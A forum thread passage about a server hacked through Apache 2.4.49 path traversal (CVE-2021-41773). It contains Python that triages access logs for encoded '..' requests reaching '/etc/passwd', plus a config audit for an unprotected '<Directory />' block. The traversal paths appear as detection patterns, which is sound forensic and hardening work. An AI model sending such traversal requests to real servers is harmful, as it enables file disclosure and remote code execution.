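# client, ident, user, [time], "method target protocol", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_target(target):
    """Percent-decode twice so both .%2e and the double-encoded %%32%65
    collapse to a literal dot before any path logic runs."""
    return unquote(unquote(target))


def escapes_root(path):
    """True if the '..' segments of a decoded path climb above '/'.

    '/blog/../index.html' stays inside the tree and is not flagged;
    '/cgi-bin/../../etc/passwd' goes above the root of the URL space,
    which only a normalization bug can turn into a real file.
    """
    depth = 0
    for seg in path.split("?", 1)[0].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def triage(log_text):
    """One record per traversal attempt:
    (ip, time, method, decoded target, status, verdict)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        if not escapes_root(decoded):
            continue
        status = int(m["status"])
        # 2xx means httpd served or executed the target. A 500 paired with
        # "AH01241: exec of '/etc/passwd' failed" in error_log still means
        # the path resolved to the real file; only the exec step failed.
        verdict = "succeeded" if 200 <= status < 300 else "attempted (%d)" % status
        hits.append((m["ip"], m["time"], m["method"], decoded, status, verdict))
    return hits


def successful_hits(log_text):
    """Only the attempts the server answered with 2xx."""
    return [h for h in triage(log_text) if h[5] == "succeeded"]


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(*hit)
```

Feed it the real file with `triage(open("/var/log/httpd/access_log").read())`. Treat the non-2xx hits as evidence too: the 500s in the post come with `AH01241: exec of '/etc/passwd' failed` in error_log, which is cgid refusing to execute a file it had already resolved outside the CGI directory, so the traversal itself worked on every one of those requests.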

#4 2021-10-07 11:17:28

idiot_user_113
Member
Registered: 2021-10-07
Posts: 2

Re: My Arch server got hacked. Help me find out why

sabroad wrote:

19:02:22 looks like directory traversal to me.

If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability https://httpd.apache.org/security/vulne … es_24.html
9:28 AM · Oct 5, 2021

https://www.tenable.com/blog/cve-2021-4 … -exploited

Thanks very much for leading me in the right direction. This indeed seems to be the way they got in. And indeed, for some stupid reason, I had the following config, which enabled the exploit:

<Directory />
    Require all granted
</Directory>

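That block is exactly the condition the Apache advisory names: the 2.4.49 traversal only reaches files outside the document root when they are not protected by `Require all denied`, and with mod_cgi or mod_cgid enabled (the `[cgid:error]` lines in the first post) it becomes remote code execution. The upstream httpd.conf ships a root block of `AllowOverride none` plus `Require all denied` and grants access only per directory below it. The following is an added example, not the poster's configuration beyond the three lines quoted: the weak block beside the corrected one, and a small audit that parses `<Directory>` containers and flags a root block that grants access or lacks the deny. The `/srv/http` document root in the hardened fragment is an assumption; use your own DocumentRoot.

```python
import re

# Constructed httpd.conf fragments. WEAK_CONF is the block quoted in the post;
# HARDENED_CONF is the upstream httpd.conf default for "/" plus an explicit
# grant for the document root (/srv/http assumed; use your DocumentRoot).
WEAK_CONF = """\
<Directory />
    Require all granted
</Directory>
"""

HARDENED_CONF = """\
<Directory />
    AllowOverride none
    Require all denied
</Directory>

<Directory "/srv/http">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
"""

# One <Directory> container; the body is taken non-greedily up to its close.
# Nested <RequireAll>/<RequireAny> groups are not interpreted by this audit.
DIR_BLOCK = re.compile(
    r'<Directory\s+"?([^">\s]+)"?\s*>(.*?)</Directory>',
    re.IGNORECASE | re.DOTALL,
)


def directory_blocks(conf):
    """Yield (path, [normalised directives]) for every <Directory> block."""
    for path, body in DIR_BLOCK.findall(conf):
        directives = []
        for raw in body.splitlines():
            line = raw.split("#", 1)[0].strip()      # drop comments
            if line:
                directives.append(" ".join(line.split()).lower())
        yield path, directives


def audit(conf):
    """Return a list of findings about the filesystem-root <Directory /> block.

    An empty list means "/" is explicitly denied, so a traversal that escapes
    the DocumentRoot gets a 403 instead of the file (or, via CGI, a shell).
    """
    findings = []
    root_seen = False
    for path, directives in directory_blocks(conf):
        if path != "/":
            continue
        root_seen = True
        if "require all granted" in directives:
            findings.append("<Directory /> grants access to the whole filesystem")
        if "require all denied" not in directives:
            findings.append('<Directory /> lacks "Require all denied"')
        if "allowoverride none" not in directives:
            findings.append('<Directory /> lacks "AllowOverride none" '
                            '(.htaccess is consulted on every path)')
    if not root_seen:
        findings.append("no <Directory /> block: the filesystem root is never explicitly denied")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", audit(conf) or ["ok"])
```

`audit(open("/etc/httpd/conf/httpd.conf").read())` is enough for the root block; remember that `Include`d files are not followed here. The real fix is still upgrading to a release with the complete patch (2.4.51 or later); the deny on `/` is what turns the next normalization bug into a 403 instead of a miner.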
